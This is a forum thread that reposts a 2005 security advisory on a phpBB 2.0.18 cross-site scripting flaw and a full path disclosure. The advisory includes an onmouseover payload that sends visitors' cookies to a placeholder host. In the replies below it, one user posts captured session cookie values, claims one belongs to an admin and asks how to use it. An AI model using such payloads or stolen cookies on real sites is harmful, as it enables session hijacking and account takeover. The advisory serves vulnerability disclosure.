Waraxe IT Security Portal

diegocure15 · Active user

Credit : Maksymilian Arciemowicz

Date : 17.12.2005

Affected Software : phpBB <= 2.0.18

Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest

that you can use this tags:

" onmouseover="alert('SecurityReason.Com')" X=" H E L O 

Exploit:

" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)
" X=" H A L O 

and have you cookies.

- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
llow.php on line 28
- -RESULT ERROR---

- --- 3. Greets ---
sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----

Original source http://securityreason.com/securityalert/269

robin1200 · Regular user

Exploit works...only problem is that I can only see my own cookie...
Rolling Eyes

ctf · Beginner

i have sucessfully exploited and i have some cookies with me one of them is admins and i want to know how can it be used ?

the cookie is

phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:2:\"16\";}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=d78d343d22d2871efec69f65854179db; phpbb2mysql_t=a:7:{i:2;i:1135074105;i:191;i:1135062519;i:33;i:1135053718;i:95;i:1135054130;i:89;i:1135062766;i:206;i:1135062837;i:247;i:1135072242;}

super · Active user

how do you use this exploit?? can you give me video clip about it. Sad

WaterBird · Active user

Wate of time because "If in phpbb is Allowed HTML tags "ON"". I know the phpbb forums have HTML tags off after instalation, and there is not mutch forums that have html tags on.